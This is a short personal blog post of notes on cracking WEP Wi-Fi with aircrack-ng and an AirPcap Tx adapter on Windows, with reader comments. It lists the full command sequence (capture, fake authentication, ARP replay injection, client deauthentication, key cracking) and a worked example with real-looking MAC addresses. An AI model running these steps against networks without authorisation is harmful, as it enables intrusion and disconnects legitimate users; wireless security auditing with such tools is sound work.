ARP injection in Windows using AirPcap Tx

Finally, I’ve had time to write down my notes on using aircrack-ng with the AirPcap Tx adapter in Windows. Before you read on, please be aware that this isn’t meant to be a guide or tutorial; it’s just my notes. Thanks 🙂

Basics

Start capturing:

airodump-ng \\.\airpcap00 airpcap CHANNELNUMBER mycapturefile

Fake auth:

aireplay-ng --fakeauth 0 -e "MYSSID" -a BSSIDMAC -h AIRPCAPMAC \\.\airpcap00

Start attack:

aireplay-ng --arpreplay -b BSSIDMAC -h CLIENTMAC \\.\airpcap00

Deauth (if we need ARPs):

aireplay-ng --deauth 3 -a BSSIDMAC -c CLIENTMAC \\.\airpcap00

Start cracking:

aircrack-ng -z mycapturefile.cap

Worked example:

airodump-ng.exe \\.\airpcap00 airpcap 11 mycapturefile
aireplay-ng --fakeauth 0 -e "WEP" -a 00:a0:c5:9d:d5:50 -h 00:02:72:67:92:8a \\.\airpcap00
aireplay-ng --arpreplay -b 00:a0:c5:9d:d5:50 -h 00:90:4b:eb:9b:36 \\.\airpcap00
aireplay-ng --deauth 3 -a 00:a0:c5:9d:d5:50 -c 00:90:4b:eb:9b:36 \\.\airpcap00
aircrack-ng -z mycapturefile.cap

Download

I’ve prepared a special release of the aircrack-ng tools originally prepared by CACE Technologies on the AirPcap CDROM. It replaces the new aireplay-ng.exe with an older one which, in my tests, appears to perform better.

Download the release of aircrack-ng for AirPcap Tx

Written by Phil Wiffen

Phil is an IT Professional working in Cambridge, England. He generally blogs about useful solutions that he comes across in his work/play.

2 Comments

Vic

How do I find the MAC address of the AirPcap Tx USB adapter? It doesn’t show in ipconfig…

Phil Wiffen

Vic: it’s written on the adapter itself. Usually where the sticky label is 🙂 It doesn’t show up in ipconfig because, technically, it’s not a “real” Windows network adapter.
